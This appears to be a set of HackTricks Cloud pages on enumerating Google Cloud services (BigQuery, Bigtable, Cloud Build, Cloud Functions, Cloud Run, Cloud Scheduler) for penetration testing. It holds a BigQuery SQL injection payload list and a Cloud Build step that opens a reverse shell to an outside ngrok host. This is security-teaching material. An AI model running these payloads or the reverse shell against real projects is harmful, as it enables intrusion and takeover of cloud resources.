bq query --nouse_legacy_sql 'INSERT INTO `digital-bonfire-410512.importeddataset.tabletest` (rank, refresh_date, dma_name, dma_id, term, week, score) VALUES (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2019-10-13", 62), (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2020-05-24", 67)'
bq insert dataset.table /tmp/mydata.json
# Get permissions
bq get-iam-policy <proj>:<dataset> # Get dataset IAM policy
bq show --format=prettyjson <proj>:<dataset> # Get dataset ACLs
bq get-iam-policy <proj>:<dataset>.<table> # Get table IAM policy
bq ls --row_access_policies <proj>:<dataset>.<table> # Get row policies
# Taxonomies (Get the IDs from the shemas of the tables)
gcloud data-catalog taxonomies describe <taxonomi-ID> --location=<location>
gcloud data-catalog taxonomies list --location <location> #Find more
gcloud data-catalog taxonomies get-iam-policy <taxonomi-ID> --location=<location>
# Get jobs executed
bq ls --jobs=true --all=true
bq show --location=<location> show --format=prettyjson --job=true <job-id>
# Misc
bq show --encryption_service_account # Get encryption service account
```
{% endcode %}
### BigQuery SQL Injection
For further information you can check the blog post: [https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac](https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac). Here just some details are going to be given.
**Comments**:
* `select 1#from here it is not working`
* `select 1/*between those it is not working*/` But just the initial one won't work
* `select 1--from here it is not working`
Get **information** about the **environment** such as:
* Current user: `select session_user()`
* Project id: `select @@project_id`
Concat rows:
* All table names: `string_agg(table_name, ', ')`
Get **datasets**, **tables** and **column** names:
* **Project** and **dataset** name:
{% code overflow="wrap" %}
```sql
SELECT catalog_name, schema_name FROM INFORMATION_SCHEMA.SCHEMATA
```
{% endcode %}
* **Column** and **table** names of **all the tables** of the dataset:
{% code overflow="wrap" %}
```sql
# SELECT table_name, column_name FROM <proj-name>.<dataset-name>.INFORMATION_SCHEMA.COLUMNS
SELECT table_name, column_name FROM <project-name>.<dataset-name>.INFORMATION_SCHEMA.COLUMNS
```
{% endcode %}
* **Other datasets** in the same project:
{% code overflow="wrap" %}
```sql
# SELECT catalog_name, schema_name, FROM <proj-name>.INFORMATION_SCHEMA.SCHEMATA
SELECT catalog_name, schema_name, NULL FROM <project-name>.INFORMATION_SCHEMA.SCHEMATA
```
{% endcode %}
**SQL Injection types:**
* Error based - casting: `select CAST(@@project_id AS INT64)`
* Error based - division by zero: `' OR if(1/(length((select('a')))-1)=1,true,false) OR '`
* Union based (you need to use ALL in bigquery): `UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#`
* Boolean based: ``' WHERE SUBSTRING((select column_name from `project_id.dataset_name.table_name` limit 1),1,1)='A'#``
* Potential time based - Usage of public datasets example: ``SELECT * FROM `bigquery-public-data.covid19_open_data.covid19_open_data` LIMIT 1000``
**Documentation:**
* All function list: [https://cloud.google.com/bigquery/docs/reference/standard-sql/functions-and-operators](https://cloud.google.com/bigquery/docs/reference/standard-sql/functions-and-operators)
* Scripting statements: [https://cloud.google.com/bigquery/docs/reference/standard-sql/scripting](https://cloud.google.com/bigquery/docs/reference/standard-sql/scripting)
### Privilege Escalation & Post Exploitation
{% content-ref url="../gcp-privilege-escalation/gcp-bigquery-privesc.md" %}
[gcp-bigquery-privesc.md](../gcp-privilege-escalation/gcp-bigquery-privesc.md)
{% endcontent-ref %}
### Persistence
{% content-ref url="../gcp-persistence/gcp-bigquery-persistence.md" %}
[gcp-bigquery-persistence.md](../gcp-persistence/gcp-bigquery-persistence.md)
{% endcontent-ref %}
## References
* [https://cloud.google.com/bigquery/docs/column-level-security-intro](https://cloud.google.com/bigquery/docs/column-level-security-intro)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

58
pentesting-cloud/gcp-security/gcp-services/gcp-bigtable-enum.md Normal file
View File

@@ -0,0 +1,58 @@
# GCP - Bigtable Enum
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## [Bigtable](https://cloud.google.com/sdk/gcloud/reference/bigtable/) <a href="#cloud-bigtable" id="cloud-bigtable"></a>
A fully managed, scalable NoSQL database service for large analytical and operational workloads with up to 99.999% availability. [Learn more](https://cloud.google.com/bigtable).
```bash
# Cloud Bigtable
gcloud bigtable instances list
gcloud bigtable instances describe <instance>
gcloud bigtable instances get-iam-policy <instance>
## Clusters
gcloud bigtable clusters list
gcloud bigtable clusters describe <cluster>
## Backups
gcloud bigtable backups list --instance <INSTANCE>
gcloud bigtable backups describe --instance <INSTANCE> <backupname>
gcloud bigtable backups get-iam-policy --instance <INSTANCE> <backupname>
## Hot Tables
gcloud bigtable hot-tablets list
## App Profiles
gcloud bigtable app-profiles list --instance <INSTANCE>
gcloud bigtable app-profiles describe --instance <INSTANCE> <app-prof>
```
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

199
pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.md Normal file
View File

@@ -0,0 +1,199 @@
# GCP - Cloud Build Enum
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Basic Information
Google Cloud Build is a managed CI/CD platform that **automates software build** and release processes, integrating with **source code repositories** and supporting a wide range of programming languages. It **allows developers to build, test, and deploy code automatically** while providing flexibility to customize build steps and workflows.
Each Cloud Build Trigger is **related to a Cloud Repository or directly connected with an external repository** (Github, Bitbucket and Gitlab).
{% hint style="success" %}
I couldn't see any way to steal the Github/Bitbucket token from here or from Cloud Repositories because when the repo is downloaded it's accessed via a [https://source.cloud.google.com/](https://source.cloud.google.com/) URL and Github is not accessed by the client.
{% endhint %}
### Events
The Cloud Build can be triggered if:
* **Push to a branch**: Specify the branch
* **Push a new tag**: Specify the tag
* P**ull request**: Specify the branch that receives the PR
* **Manual Invocation**
* **Pub/Sub message:** Specify the topic
* **Webhook event**: Will expose a HTTPS URL and the request must be authenticated with a secret
### Execution
There are 3 options:
* A yaml/json **specifying the commands** to execute. Usually: `/cloudbuild.yaml`
* Only one that can be specified “inline” in the web console and in the cli
* Most common option
* Relevant for unauthenticated access
* A **Dockerfile** to build
* A **Buildpack** to build
### SA Permissions
The **Service Account has the `cloud-platform` scope**, so it can **use all the privileges.** If **no SA is specified** (like when doing submit) the **default SA** `<proj-number>@cloudbuild.gserviceaccount.com` will be **used.**
By default no permissions are given but it's fairly easy to give it some:
<figure><img src="../../../.gitbook/assets/image (16).png" alt=""><figcaption></figcaption></figure>
### Approvals
It's possible to config a Cloud Build to **require approvals for build executions** (disabled by default).
### PR Approvals
When the trigger is PR because **anyone can perform PRs to public repositories** it would be very dangerous to just **allow the execution of the trigger with any PR**. Therefore, by default, the execution will only be **automatic for owners and collaborators**, and in order to execute the trigger with other users PRs an owner or collaborator must comment `/gcbrun`.
<figure><img src="../../../.gitbook/assets/image (339).png" alt="" width="563"><figcaption></figcaption></figure>
### Connections & Repositories
Connections can be created over:
* **GitHub:** It will show an OAuth prompt asking for permissions to **get a Github token** that will be stored inside the **Secret Manager.**
* **GitHub Enterprise:** It will ask to install a **GithubApp**. An **authentication token** from your GitHub Enterprise host will be created and stored in this project as a S**ecret Manager** secret.
* **GitLab / Enterprise:** You need to **provide the API access token and the Read API access toke**n which will stored in the **Secret Manager.**
Once a connection is generated, you can use it to **link repositories that the Github account has access** to.
This option is available through the button:
<figure><img src="../../../.gitbook/assets/image (17).png" alt=""><figcaption></figcaption></figure>
{% hint style="success" %}
Note that repositories connected with this method are **only available in Triggers using 2nd generation.**
{% endhint %}
### Connect a Repository
This is not the same as a **`connection`**. This allows **different** ways to get **access to a Github or Bitbucket** repository but **doesn't generate a connection object, but it does generate a repository object (of 1st generation).**
This option is available through the button:
<figure><img src="../../../.gitbook/assets/image (18).png" alt=""><figcaption></figcaption></figure>
### Storage
Sometimes Cloud Build will **generate a new storage to store the files for the trigger**. This happens for example in the example that GCP offers with:
```bash
git clone https://github.com/GoogleCloudBuild/cloud-console-sample-build && \
cd cloud-console-sample-build && \
gcloud builds submit --config cloudbuild.yaml --region=global
```
A Storage bucket called [security-devbox\_cloudbuild](https://console.cloud.google.com/storage/browser/security-devbox_cloudbuild;tab=objects?forceOnBucketsSortingFiltering=false\&project=security-devbox) is created to store a `.tgz` with the files to be used.
### Get shell
```yaml
steps:
- name: bash
script: |
#!/usr/bin/env bash
bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/12395 0>&1
options:
logging: CLOUD_LOGGING_ONLY
```
Install gcloud inside cloud build:
```bash
# https://stackoverflow.com/questions/28372328/how-to-install-the-google-cloud-sdk-in-a-docker-image
curl https://dl.google.com/dl/cloudsdk/release/google-cloud-sdk.tar.gz > /tmp/google-cloud-sdk.tar.gz
mkdir -p /usr/local/gcloud
tar -C /usr/local/gcloud -xvf /tmp/google-cloud-sdk.tar.gz
/usr/local/gcloud/google-cloud-sdk/install.sh
```
### Enumeration
You could find **sensitive info in build configs and logs**.
```bash
# Get configured triggers configurations
gcloud builds triggers list # Check for the words github and bitbucket
gcloud builds triggers describe <trigger-name>
# Get build executions
gcloud builds list
gcloud builds describe <build-uuid> # Get even the build yaml if defined in there
gcloud builds log <build-uuid> # Get build logs
# List all connections of each region
regions=("${(@f)$(gcloud compute regions list --format='value(name)')}")
for region in $regions; do
echo "Listing build connections in region: $region"
connections=("${(@f)$(gcloud builds connections list --region="$region" --format='value(name)')}")
if [[ ${#connections[@]} -eq 0 ]]; then
echo "No connections found in region $region."
else
for connection in $connections; do
echo "Describing connection $connection in region $region"
gcloud builds connections describe "$connection" --region="$region"
echo "-----------------------------------------"
done
fi
echo "========================================="
done
# List all worker-pools
regions=("${(@f)$(gcloud compute regions list --format='value(name)')}")
for region in $regions; do
echo "Listing build worker-pools in region: $region"
gcloud builds worker-pools list --region="$region"
echo "-----------------------------------------"
done
```
### Privilege Escalation
{% content-ref url="../gcp-privilege-escalation/gcp-cloudbuild-privesc.md" %}
[gcp-cloudbuild-privesc.md](../gcp-privilege-escalation/gcp-cloudbuild-privesc.md)
{% endcontent-ref %}
### Unauthenticated Access
{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md" %}
[gcp-cloud-build-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md)
{% endcontent-ref %}
### Post Exploitation
{% content-ref url="../gcp-post-exploitation/gcp-cloud-build-post-exploitation.md" %}
[gcp-cloud-build-post-exploitation.md](../gcp-post-exploitation/gcp-cloud-build-post-exploitation.md)
{% endcontent-ref %}
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

135
pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.md Normal file
View File

@@ -0,0 +1,135 @@
# GCP - Cloud Functions Enum
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Cloud Functions <a href="#reviewing-cloud-functions" id="reviewing-cloud-functions"></a>
[Google Cloud Functions](https://cloud.google.com/functions/) are designed to host your code, which **gets executed in response to events**, without necessitating the management of a host operating system. Additionally, these functions support the storage of environment variables, which the code can utilize.
### Storage
The Cloud Functions **code is stored in GCP Storage**. Therefore, anyone with **read access over buckets** in GCP is going to be able to **read the Cloud Functions code**.\
The code is stored in a bucket like one of the following:
* `gcf-sources-<number>-<region>/<function-name>-<uuid>/version-<n>/function-source.zip`
* `gcf-v2-sources-<number>-<region>/<function-name>function-source.zip`
For example:\
`gcf-sources-645468741258-us-central1/function-1-003dcbdf-32e1-430f-a5ff-785a6e238c76/version-4/function-source.zip`
{% hint style="warning" %}
Any user with **read privileges over the bucket** storing the Cloud Function could **read the executed code**.
{% endhint %}
### Artifact Registry
If the cloud function is configured so the executed Docker container is stored inside and Artifact Registry repo inside the project, anyway with read access over the repo will be able to download the image and check the source code. For more info check:
{% content-ref url="gcp-artifact-registry-enum.md" %}
[gcp-artifact-registry-enum.md](gcp-artifact-registry-enum.md)
{% endcontent-ref %}
### SA
If not specified, by default the **App Engine Default Service Account** with **Editor permissions** over the project will be attached to the Cloud Function.
### Triggers, URL & Authentication
When a Cloud Function is created the **trigger** needs to be specified. One common one is **HTTPS**, this will **create an URL where the function** can be triggered via web browsing.\
Other triggers are pub/sub, Storage, Filestore...
The URL format is **`https://<region>-<project-gcp-name>.cloudfunctions.net/<func_name>`**
When the HTTPS tigger is used, it's also indicated if the **caller needs to have IAM authorization** to call the Function or if **everyone** can just call it:
<figure><img src="../../../.gitbook/assets/image (19).png" alt=""><figcaption></figcaption></figure>
### Inside the Cloud Function
The code is **downloaded inside** the folder **`/workspace`** with the same file names as the ones the files have in the Cloud Function and is executed with the user `www-data`.\
The disk **isn't mounted as read-only.**
### Enumeration
```bash
# List functions
gcloud functions list
gcloud functions describe <func_name> # Check triggers to see how is this function invoked
gcloud functions get-iam-policy <func_name>
# Get logs of previous runs. By default, limits to 10 lines
gcloud functions logs read <func_name> --limit [NUMBER]
# Call a function
curl https://<region>-<project>.cloudfunctions.net/<func_name>
gcloud functions call <func_name> --data='{"message": "Hello World!"}'
# If you know the name of projects you could try to BF cloud functions names
# Get events that could be used to trigger a cloud function
gcloud functions event-types list
# Access function with authentication
curl -X POST https://<region>-<project>.cloudfunctions.net/<func_name> \
-H "Authorization: bearer $(gcloud auth print-identity-token)" \
-H "Content-Type: application/json" \
-d '{}'
```
### Privilege Escalation
In the following page, you can check how to **abuse cloud function permissions to escalate privileges**:
{% content-ref url="../gcp-privilege-escalation/gcp-cloudfunctions-privesc.md" %}
[gcp-cloudfunctions-privesc.md](../gcp-privilege-escalation/gcp-cloudfunctions-privesc.md)
{% endcontent-ref %}
### Unauthenticated Access
{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md" %}
[gcp-cloud-functions-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md)
{% endcontent-ref %}
### Post Exploitation
{% content-ref url="../gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md" %}
[gcp-cloud-functions-post-exploitation.md](../gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md)
{% endcontent-ref %}
### Persistence
{% content-ref url="../gcp-persistence/gcp-cloud-functions-persistence.md" %}
[gcp-cloud-functions-persistence.md](../gcp-persistence/gcp-cloud-functions-persistence.md)
{% endcontent-ref %}
## References
* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

137
pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.md Normal file
View File

@@ -0,0 +1,137 @@
# GCP - Cloud Run Enum
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Cloud Run <a href="#reviewing-cloud-run-configurations" id="reviewing-cloud-run-configurations"></a>
Cloud Run is a serverless managed compute platform that lets you **run containers** directly on top of Google's scalable infrastructure.
You can run your container or If you're using Go, Node.js, Python, Java, .NET Core, or Ruby, you can use the [source-based deployment](https://cloud.google.com/run/docs/deploying-source-code) option that **builds the container for you.**
Google has built Cloud Run to **work well together with other services on Google Cloud**, so you can build full-featured applications.
### Services and jobs <a href="#services-and-jobs" id="services-and-jobs"></a>
On Cloud Run, your code can either run continuously as a _**service**_ or as a _**job**_. Both services and jobs run in the same environment and can use the same integrations with other services on Google Cloud.
* **Cloud Run services.** Used to run code that responds to web requests, or events.
* **Cloud Run jobs.** Used to run code that performs work (a job) and quits when the work is done.
## Cloud Run Service
Google [Cloud Run](https://cloud.google.com/run) is another serverless offer where you can search for env variables also. Cloud Run creates a small web server, running on port 8080 inside the container by default, that sits around waiting for an HTTP GET request. When the request is received, a job is executed and the job log is output via an HTTP response.
### Relevant details
* By **default**, the **access** to the web server is **public**, but it can also be **limited to internal traffic** (VPC...)\
Moreover, the **authentication** to contact the web server can be **allowing all** or to **require authentication via IAM**.
* By default, the **encryption** uses a **Google managed key**, but a **CMEK** (Customer Managed Encryption Key) from **KMS** can also be **chosen**.
* By **default**, the **service account** used is the **Compute Engine default one** which has **Editor** access over the project and it has the **scope `cloud-platform`.**
* It's possible to define **clear-text environment variables** for the execution, and even **mount cloud secrets** or **add cloud secrets to environment variables.**
* It's also possible to **add connections with Cloud SQL** and **mount a file system.**
* The **URLs** of the services deployed are similar to **`https://<svc-name>-<random>.a.run.app`**
* A Run Service can have **more than 1 version or revision**, and **split traffic** among several revisions.
### Enumeration
```bash
# List services
gcloud run services list
gcloud run services list --platform=managed
gcloud run services list --platform=gke
# Get info of a service
gcloud run services describe --region <region> <svc-name>
# Get info of all the services together
gcloud run services list --format=yaml
gcloud run services list --platform=managed --format=json
gcloud run services list --platform=gke --format=json
# Get policy
gcloud run services get-iam-policy --region <region> <svc-name>
# Get revisions
gcloud run revisions list --region <region>
gcloud run revisions describe --region <region> <revision>
# Get domains
gcloud run domain-mappings list
gcloud run domain-mappings describe <name>
# Attempt to trigger a job unauthenticated
curl <url>
# Attempt to trigger a job with your current gcloud authorization
curl -H "Authorization: Bearer $(gcloud auth print-identity-token)" <url>
```
## Cloud Run Jobs
Cloud Run jobs are be a better fit for **containers that run to completion and don't serve requests**. Jobs don't have the ability to serve requests or listen on a port. This means that unlike Cloud Run services, jobs should not bundle a web server. Instead, jobs containers should exit when they are done.
### Enumeration
```bash
gcloud beta run jobs list
gcloud beta run jobs describe --region <region> <job-name>
gcloud beta run jobs get-iam-policy --region <region> <job-name>
```
## Privilege Escalation
In the following page, you can check how to **abuse cloud run permissions to escalate privileges**:
{% content-ref url="../gcp-privilege-escalation/gcp-run-privesc.md" %}
[gcp-run-privesc.md](../gcp-privilege-escalation/gcp-run-privesc.md)
{% endcontent-ref %}
## Unauthenticated Access
{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md" %}
[gcp-cloud-run-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md)
{% endcontent-ref %}
## Post Exploitation
{% content-ref url="../gcp-post-exploitation/gcp-cloud-run-post-exploitation.md" %}
[gcp-cloud-run-post-exploitation.md](../gcp-post-exploitation/gcp-cloud-run-post-exploitation.md)
{% endcontent-ref %}
## Persistence
{% content-ref url="../gcp-persistence/gcp-cloud-run-persistence.md" %}
[gcp-cloud-run-persistence.md](../gcp-persistence/gcp-cloud-run-persistence.md)
{% endcontent-ref %}
## References
* [https://cloud.google.com/run/docs/overview/what-is-cloud-run](https://cloud.google.com/run/docs/overview/what-is-cloud-run)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

73
pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.md Normal file
View File

@@ -0,0 +1,73 @@
# GCP - Cloud Scheduler Enum
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Basic Information
Google Cloud Scheduler is a fully managed **cron job service** that allows you to run arbitrary jobs—such as batch, big data jobs, cloud infrastructure operations—at fixed times, dates, or intervals. It is integrated with Google Cloud services, providing a way to **automate various tasks like updates or batch processing on a regular schedule**.
Although from an offensive point of view this sounds amazing, it actually isn't that interesting because the service just allow to schedule certain simple actions at a certain time and not to execute arbitrary code.
At the moment of this writing these are the actions this service allows to schedule:
<figure><img src="../../../.gitbook/assets/image (347).png" alt="" width="563"><figcaption></figcaption></figure>
* **HTTP**: Send an HTTP request defining the headers and body of the request.
* **Pub/Sub**: Send a message into an specific topic
* **App Engine HTTP**: Send an HTTP request to an app built in App Engine
